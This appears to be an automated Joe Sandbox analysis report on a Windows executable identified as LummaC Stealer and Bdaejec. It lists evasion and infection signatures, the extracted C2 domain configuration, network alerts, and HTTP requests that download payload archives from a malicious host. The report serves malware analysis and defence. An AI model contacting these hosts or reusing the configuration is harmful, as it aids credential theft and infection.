Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lisect_AVT_24003_G1A_70.exe

Overview

General Information

Sample name:Lisect_AVT_24003_G1A_70.exe
Analysis ID:1481154
MD5:641443f984c1754a4d606b248b334577
SHA1:b618cd68aeb6ac78600f312c70ee484d6931559c
SHA256:def706463545d7e16aa4a10449854f28bd979780cd227affd5c0c2ad52ae8026
Tags:exe
Infos:

Detection

LummaC, Bdaejec, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • Lisect_AVT_24003_G1A_70.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe" MD5: 641443F984C1754A4D606B248B334577)
    • oHOvZLBf.exe (PID: 7520 cmdline: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 7836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 1528 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro", "strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro"], "Build id": "kPnM2L--LogsDillerCloud"}
SourceRuleDescriptionAuthorStrings
Process Memory Space: oHOvZLBf.exe PID: 7520JoeSecurity_BdaejecYara detected BdaejecJoe Security
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe, ParentCommandLine: "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe", ParentImage: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe, ParentProcessId: 7464, ParentProcessName: Lisect_AVT_24003_G1A_70.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, ProcessId: 7520, ProcessName: oHOvZLBf.exe
      No Snort rule has matched
      Timestamp:2024-07-25T04:58:43.778567+0200
      SID:2050856
      Source Port:63883
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:43.766900+0200
      SID:2050858
      Source Port:59294
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:57.433919+0200
      SID:2022930
      Source Port:443
      Destination Port:49708
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-07-25T04:58:39.801665+0200
      SID:2838522
      Source Port:54401
      Destination Port:53
      Protocol:UDP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-07-25T04:58:43.832441+0200
      SID:2050857
      Source Port:50584
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:44.570213+0200
      SID:2807908
      Source Port:49700
      Destination Port:799
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-07-25T04:59:36.509557+0200
      SID:2022930
      Source Port:443
      Destination Port:62958
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-07-25T04:58:43.634105+0200
      SID:2050898
      Source Port:63317
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:43.800724+0200
      SID:2050860
      Source Port:64456
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:59:03.851303+0200
      SID:2028371
      Source Port:62955
      Destination Port:443
      Protocol:TCP
      Classtype:Unknown Traffic
      Timestamp:2024-07-25T04:58:47.684516+0200
      SID:2807908
      Source Port:49701
      Destination Port:799
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-07-25T04:58:40.340897+0200
      SID:2807908
      Source Port:49699
      Destination Port:799
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-07-25T04:58:43.789767+0200
      SID:2050861
      Source Port:61257
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:43.811138+0200
      SID:2050859
      Source Port:57262
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Lisect_AVT_24003_G1A_70.exeAvira: detected
      Source: http://ddos.dnsnb8.net:799/cj//k3.rarURL Reputation: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarURL Reputation: Label: malware
      Source: https://snuggleapplicationswo.fun/yAvira URL Cloud: Label: malware
      Source: healthproline.proAvira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/apiAvira URL Cloud: Label: malware
      Source: https://telephoneverdictyow.site/Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
      Source: telephoneverdictyow.siteAvira URL Cloud: Label: malware
      Source: https://strainriskpropos.store:443/api7Avira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/apii9Avira URL Cloud: Label: malware
      Source: https://telephoneverdictyow.site/7Avira URL Cloud: Label: malware
      Source: https://telephoneverdictyow.site/8Avira URL Cloud: Label: malware
      Source: https://theoryapparatusjuko.fun/Avira URL Cloud: Label: malware
      Source: smallrabbitcrossing.siteAvira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarTqAvira URL Cloud: Label: malware
      Source: https://theoryapparatusjuko.fun/apiAvira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarOAvira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarDC:Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarlAvira URL Cloud: Label: malware
      Source: https://punchtelephoneverdi.store/Avira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k3.raroC:Avira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/apiGAvira URL Cloud: Label: malware
      Source: theoryapparatusjuko.funAvira URL Cloud: Label: malware
      Source: https://smallrabbitcrossing.site/Avira URL Cloud: Label: malware
      Source: snuggleapplicationswo.funAvira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k3.rar4Avira URL Cloud: Label: phishing
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarcAvira URL Cloud: Label: phishing
      Source: https://smallrabbitcrossing.site/MAvira URL Cloud: Label: malware
      Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
      Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
      Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
      Source: Lisect_AVT_24003_G1A_70.exe.7464.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro", "strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro"], "Build id": "kPnM2L--LogsDillerCloud"}
      Source: ddos.dnsnb8.netVirustotal: Detection: 12%Perma Link
      Source: strainriskpropos.storeVirustotal: Detection: 21%Perma Link
      Source: snuggleapplicationswo.funVirustotal: Detection: 21%Perma Link
      Source: telephoneverdictyow.siteVirustotal: Detection: 21%Perma Link
      Source: punchtelephoneverdi.storeVirustotal: Detection: 20%Perma Link
      Source: smallrabbitcrossing.siteVirustotal: Detection: 21%Perma Link
      Source: healthproline.proVirustotal: Detection: 10%Perma Link
      Source: theoryapparatusjuko.funVirustotal: Detection: 20%Perma Link
      Source: healthproline.proVirustotal: Detection: 10%Perma Link
      Source: https://strainriskpropos.store/apiVirustotal: Detection: 18%Perma Link
      Source: https://strainriskpropos.store:443/api7Virustotal: Detection: 7%Perma Link
      Source: https://telephoneverdictyow.site/Virustotal: Detection: 19%Perma Link
      Source: smallrabbitcrossing.siteVirustotal: Detection: 21%Perma Link
      Source: telephoneverdictyow.siteVirustotal: Detection: 21%Perma Link
      Source: https://theoryapparatusjuko.fun/Virustotal: Detection: 20%Perma Link
      Source: https://theoryapparatusjuko.fun/apiVirustotal: Detection: 18%Perma Link
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarDC:Virustotal: Detection: 9%Perma Link
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarlVirustotal: Detection: 10%Perma Link
      Source: https://strainriskpropos.store/apiGVirustotal: Detection: 17%Perma Link
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarOVirustotal: Detection: 12%Perma Link
      Source: theoryapparatusjuko.funVirustotal: Detection: 20%Perma Link
      Source: https://smallrabbitcrossing.site/Virustotal: Detection: 22%Perma Link
      Source: https://strainriskpropos.store/Virustotal: Detection: 21%Perma Link
      Source: http://ddos.dnsnb8.net:799/cj//k3.raroC:Virustotal: Detection: 14%Perma Link
      Source: http://ddos.dnsnb8.net:799/cj//k3.rar4Virustotal: Detection: 14%Perma Link
      Source: https://punchtelephoneverdi.store/Virustotal: Detection: 20%Perma Link
      Source: snuggleapplicationswo.funVirustotal: Detection: 21%Perma Link
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarcVirustotal: Detection: 11%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeReversingLabs: Detection: 92%
      Source: Lisect_AVT_24003_G1A_70.exeVirustotal: Detection: 86%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
      Source: Lisect_AVT_24003_G1A_70.exeJoe Sandbox ML: detected
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: strainriskpropos.stor
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: telephoneverdictyow.site
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: punchtelephoneverdi.stor
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: smallrabbitcrossing.site
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: snuggleapplicationswo.fun
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: theoryapparatusjuko.fun
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: healthproline.pro
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString decryptor: kPnM2L--LogsDillerCloud
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: Lisect_AVT_24003_G1A_70.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

      Spreading

      barindex
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_00DF29E2
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00DF2B8C
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

      Networking

      barindex
      Source: Malware configuration extractorURLs: strainriskpropos.stor
      Source: Malware configuration extractorURLs: telephoneverdictyow.site
      Source: Malware configuration extractorURLs: punchtelephoneverdi.stor
      Source: Malware configuration extractorURLs: smallrabbitcrossing.site
      Source: Malware configuration extractorURLs: smallrabbitcrossing.site
      Source: Malware configuration extractorURLs: snuggleapplicationswo.fun
      Source: Malware configuration extractorURLs: theoryapparatusjuko.fun
      Source: Malware configuration extractorURLs: healthproline.pro
      Source: Malware configuration extractorURLs: strainriskpropos.stor
      Source: Malware configuration extractorURLs: telephoneverdictyow.site
      Source: Malware configuration extractorURLs: punchtelephoneverdi.stor
      Source: Malware configuration extractorURLs: smallrabbitcrossing.site
      Source: Malware configuration extractorURLs: smallrabbitcrossing.site
      Source: Malware configuration extractorURLs: snuggleapplicationswo.fun
      Source: Malware configuration extractorURLs: theoryapparatusjuko.fun
      Source: Malware configuration extractorURLs: healthproline.pro
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 799
      Source: global trafficTCP traffic: 192.168.2.7:49699 -> 44.221.84.105:799
      Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
      Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exeCode function: 2_2_00DF1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,2_2_00DF1099
      Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
      Source: global trafficDNS traffic detected: DNS query: healthproline.pro
      Source: global trafficDNS traffic detected: DNS query: theoryapparatusjuko.fun
      Source: global trafficDNS traffic detected: DNS query: snuggleapplicationswo.fun
      Source: global trafficDNS traffic detected: DNS query: smallrabbitcrossing.site
      Source: global trafficDNS traffic detected: DNS query: punchtelephoneverdi.store
      Source: global trafficDNS traffic detected: DNS query: telephoneverdictyow.site
      Source: global trafficDNS traffic detected: DNS query: strainriskpropos.store
      Source: oHOvZLBf.exe, 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmp, oHOvZLBf.exe, 00000002.00000003.1289900252.00000000007F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
      Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
      Source: oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarDC:
      Source: oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarO
      Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarTq
      Source: oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarc
      Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
      Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
      Source: oHOvZLBf.exe, 00000002.00000002.1539440567.000000000289A000.00000004.00000010.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
      Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar4
      Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.raroC:
      Source: Amcache.hve.2.drString found in binary or memory: http://upx.sf.net
      Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.com
      Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.comHolger
      Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.com
      Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.comBrendon
      Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.com
      Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.comDeepak
      Source: SciTE.exe.2.drString found in binary or memory: http://www.lua.org
      Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.com
      Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.comJosiah
      Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org
      Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org/scite.rng
      Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.com
      Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.comMathias
      Source: oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comJq
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://punchtelephoneverdi.store/
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smallrabbitcrossing.site/
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smallrabbitcrossing.site/M
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snuggleapplicationswo.fun/y
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342368005.0000000001EE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strainriskpropos.store/
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EF9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001EF9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strainriskpropos.store/api
      Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strainriskpropos.store/apiG
